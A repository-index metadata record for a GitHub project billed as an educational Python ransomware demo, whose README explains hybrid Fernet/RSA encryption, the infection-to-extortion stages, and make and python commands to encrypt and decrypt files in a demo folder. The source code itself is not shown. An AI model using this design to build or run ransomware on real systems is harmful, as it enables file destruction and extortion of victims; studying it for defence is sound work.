{"id":25065816,"url":"https://github.com/dubniczky/ransomware","last_synced_at":"2025-03-31T13:28:23.737Z","repository":{"id":160045571,"uuid":"520920168","full_name":"dubniczky/Ransomware","owner":"dubniczky","description":"A simple ransomware implementation in python for educational purposes","archived":false,"fork":false,"pushed_at":"2022-08-03T16:06:59.000Z","size":34,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-06T19:49:12.617Z","etag":null,"topics":["exploit","hack","python","ransomware"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dubniczky.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-08-03T14:44:19.000Z","updated_at":"2022-08-03T14:45:20.000Z","dependencies_parsed_at":null,"dependency_job_id":"9fd47231-b566-4428-8236-b918af22726c","html_url":"https://github.com/dubniczky/Ransomware","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubniczky%2FRansomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubniczky%2FRansomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubniczky%2FRansomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubniczky%2FRansomware/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dubniczky","download_url":"https://codeload.github.com/dubniczky/Ransomware/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246473353,"owners_count":20783258,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","hack","python","ransomware"],"created_at":"2025-02-06T19:45:06.691Z","updated_at":"2025-03-31T13:28:23.732Z","avatar_url":"https://github.com/dubniczky.png","language":"Python","funding_links":["https://www.buymeacoffee.com/dubniczky"],"categories":[],"sub_categories":[],"readme":"# Ransomware Demo\n\n## Disclaimer\n\nThis python ransomware is for educational purposes for security engineers and analysts. Do not use for any purpose other than that and I am not responsible for your actions.\n\n## Support ❤️\n\nIf you find the project useful, please consider supporting, or contributing.\n\n[![\"Buy Me A Coffee\"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/dubniczky)\n\n## Details\n\nA ransomware is a type of malware that executes on a target's machine and encrypts files that it deems useful with a symmetric key. After encryption only the hackers have the option to recover the original files.\n\nAt this point, the hackers usually ask for money in the form of cryptocurrencies, gift cards, or other hard to trace means in exchange for the decryption keys.\n\nA more complex ransomware system might have other components, like a way to spread to other devices on the network, or email itself to other people on the victim's contact list.\n\n## Implementation\n\nThis implementation uses a `hybrid key` method. This means that the data is encrypted with a symmetric key, then the key is saved on the drive encrypted with a public key.  \nThanks to this, it's not not required to transmit the key to a remote server, instead the victim will be able to attach it to their payment, to which the hacker will (in some cases) send the original key as a response.\n\n### Stages:\n\n1. **Key generation**: the hacker generates an asymmetric key pair. They will then attack the public key to the payload script.\n2. **Infection**: The hacker will find a way to infect a target computer. There are countless methods for this, but not important in our case.\n3. **Encryption**: The infected machine will run the payload and have (presumably) all of it's important files encrypted and practically unusable.\n4. **Extortion**: The hacker will display some message, informing the victim that their machine has been hijacked and the only way to recover the files is to pay the ransome and send the saved key.\n5. **Decryption**: Given the victim pays the ransome, the hacker decrypts the key with their asymmetric private key and transmits the plain key to the victim, who is then able to decrypt all the files.\n\n## Technical details\n\n1. The hacker generates a `2048` bit asymmetric key pair. Attaches the public key to the payload and keeps the private key.\n2. In the encryption step, a random key is generated, then, all files that match the pre-determined glob patterns are encrypted. The key is then encrypted with the public key in the payload and written to the storage device alongside a map of the enrypted files.\n3. The encrypted key can then be decrypted with the private asymmetric key generated in step 1.\n4. The data can then be decrypted using the decrypted random key generated in step 2.\n\nThe data is encrypted with a simple encryption library in python called Fernet. The key is encrypted with RSA.\n\n## Usage\n\n### Test run\n\nReset the demo project\n\n```bash\nmake reset\n```\n\nEncrypt files, save key and map\n\n```bash\nmake encrypt\n```\n\nDecrypt key with private key, then decrypt files\n\n```bash\nmake decrypt\n```\n\nAfter the test run, the demo folder should look the same as it did before\n\n### Detailed usage\n\n1. Reset demo folder\n\n```bash\nmake reset\n```\n\n2. Generate key pair\n\n```bash\nmkdir -p keys\npython3 generate.py 'keys/private.key' 'keys/private.key'\n```\n\n3. Replace the contents of the `PUBLIC_KEY` variable inside `encrypt.py` with the generated public key in `keys/private.key`\n\n4. Update `ENCRYPT_GLOBS` variable in `encrypt.py` to include any other globs, then run the encryption.\n\n```bash\npython3 encrypt.py\n```\n\n5. Decrypt the key saved in the local directory.\n\n```bash\npython3 unlock.py 'keys/private.key' $(cat secret.key)\n```\n\n6. Take the output of the previous command and use it to decrypt the files\n\n```bash\npython3 decrypt.py map.log DECYPTED_KEY\n```\n\nAt this point you have successfully decrypted the files.\n\n## Resources\n\nCryptography library documentation: [docs](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdubniczky%2Fransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdubniczky%2Fransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdubniczky%2Fransomware/lists"}